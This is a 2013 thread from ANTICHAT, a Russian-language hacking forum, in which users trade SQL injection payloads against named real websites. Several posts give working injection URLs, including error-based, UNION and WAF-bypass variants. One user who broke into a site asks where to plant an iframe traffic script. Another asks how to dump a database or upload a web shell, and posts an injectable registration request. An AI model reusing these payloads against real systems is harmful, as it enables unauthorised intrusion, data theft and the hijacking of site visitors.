ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.12.2013, 18:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Известна версия '5.5.27-log
Код:
Code:
http://www.briese.net.ua/shkala-zarplat%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
но дальше ни в какую не хочет раскручиваться. |
|
|
|
04.12.2013, 19:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
http://www.briese.net.ua/shkala-zarplawertt%27and%28select%201%20from%28select%201 %20from%28select%201%20union%20select%202%20%29fr% 20group%20by%20concat%281,user%28%29,@a:=@a-1%29%20having%20min%28@a:=1%29%29s%29%20--%20w
|
|
|
|
05.12.2013, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Код:
Code:
http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*
чет не получается может кто поможет нормально раскурить? |
|
|
|
05.12.2013, 01:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от GhostW
GhostW said:
Код:
Code:
http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*
чет не получается
может кто поможет нормально раскурить? как посчитали 5 колонок? и что там делает кавычка? скуля же integer..
http://www.iglobalforum.com/event.php?id=90+and+0+/*!union*/select+1,2,3,4,version(),6,7,8,9,10,1,2,3,4,5,6,7, 8,9,10,1,2,3--+
вывод в
|
|
|
05.12.2013, 01:19
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
http://wiki.auditory.ru/Semenov_sql_injection'
Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
|
|
|
|
05.12.2013, 02:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от kingbeef
kingbeef said:
http://wiki.auditory.ru/Semenov_sql_injection'
Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3 a,(select(version())))))='1
|
|
|
|
08.12.2013, 04:00
|
|
Новичок
Регистрация: 20.02.2008
Сообщений: 2
Провел на форуме:
23939
Репутация:
1
|
|
привет )) взломал сайт а там такое в файле INDEX.PHP такое :
getDefaultLanguage();
$url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT;
NeoNavigator::jump($url);
?>
и такое :
вот как выглядит сама система :
http://i42.tinypic.com/112hpud.jpg
КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?
|
|
|
|
08.12.2013, 18:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
При переходе на сайте на list.html?page=&page='
выдает
Сообщение от None
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '-1)*100 + 1 AND \'. (severity 15) in D:\www\*****\type1.inc.php on line 269
Warning: mssql_query() [function.mssql-query]: Query failed in D:\www\*****\type1.inc.php on line 269
Warning: mssql_fetch_array(): supplied argument is not a valid MS SQL-result resource in D:\www\*****\type1.inc.php on line 273
Можно как-то раскрутить и попробовать слить бд или залить шелл? Хелпаните..
Если поставить скобки или другой символ, то же самое выдает.
С &page=(select+top+1+table_name+from+information_sc hema.tables)
Выдает мне Conversion failed when converting the nvarchar value 'Таблица' to data type int. (severity 16) in .....
но при
(select+top+1+table_name+from+information_schema.t ables+where+table_name+not+in+('эта таблица'))
выдает мне message: Incorrect syntax near 'эта же таблица\'. (severity 15) in .... |
|
|
|
11.12.2013, 00:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
При пост запросе
Сообщение от None
POST /register.php HTTP/1.1
Host: 1234.net
Content-Type: application/x-www-form-urlencoded
name=%5C&username=5451454&password1=12345&password 2=12345&email1=asaa%40mail3.ru&email2=asaa%40mail3 .ru
в нейм %5C или \
выдает
Сообщение от None
Query Error!
Executing: INSERT INTO user values (NULL,'5451454','827ccb0eea8a706c4c34a16891f84e7b' ,'asaa@mail3.ru','\',NOW());
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\',NOW())' at line 1
Здесь куда-то иньекцию подставить можно? или как то это использовать...? |
|
|
|
11.12.2013, 01:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
zombak18
сам же сказал параметр name уязвим
напрмер введи вместо %5C
(пробелы в запросе убери)
Да вот имеено.. дело в том, что если пишешь какой либо запрос, он просто пропускает это поле и регистрирует аккаунт без ошибок..
%5C' - ошибка
' - нет ошибки
%5C' пробел - нет ошибки
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
